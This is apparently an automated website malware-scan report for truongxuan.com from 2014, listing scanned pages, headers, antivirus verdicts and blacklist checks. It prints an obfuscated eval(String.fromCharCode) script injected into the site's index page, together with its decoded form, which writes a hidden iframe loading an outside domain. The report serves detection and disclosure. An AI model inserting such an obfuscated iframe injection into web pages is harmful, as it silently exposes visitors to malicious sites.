New scan:

Malware Scanner report for truongxuan.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://truongxuan.com/
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 18:37:08 GMT
Accept-Ranges: bytes
ETag: "5f5c484ab3cfc91:c4afb"
Server: Microsoft-IIS/6.0
Content-Length: 1712
Content-Location: http://truongxuan.com/truongxuan/index.htm
Content-Type: text/html
Last-Modified: Fri, 08 May 2009 08:02:10 GMT
X-Powered-By: ASP.NET
clean
http://truongxuan.com/truongxuan/index.htm
200 OK
Content-Length: 1712
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48))

Decoded script:


var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340
var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340
<iframe src="http://wollance.com/" width="1" height="3"></iframe>

Antivirus reports:

Avast
HTML:Iframe-inf
TrendMicro-HouseCall
Possible_Hifrm-5
TrendMicro
Possible_Hifrm-5
Microsoft
Exploit:HTML/IframeRef.CE
NANO-Antivirus
Trojan.Script.Iframe.sofff
VIPRE
Malware.JS.Generic (JS)
Norman
Iframe.MM
Sophos
Mal/Iframe-F
GData
HTML:Iframe-inf
ESET-NOD32
HTML/Iframe.B.Gen

http://truongxuan.com/test404page.js
404 Not Found
Content-Length: 1549
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: truongxuan.com

Result:
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 18:37:08 GMT
Accept-Ranges: bytes
ETag: "5f5c484ab3cfc91:c4afb"
Server: Microsoft-IIS/6.0
Content-Length: 1712
Content-Location: http://truongxuan.com/truongxuan/index.htm
Content-Type: text/html
Last-Modified: Fri, 08 May 2009 08:02:10 GMT
X-Powered-By: ASP.NET

...1712 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: truongxuan.com
Referer: http://www.google.com/search?q=truongxuan.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=truongxuan.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://truongxuan.com/

Result: truongxuan.com is not infected or malware details are not published yet.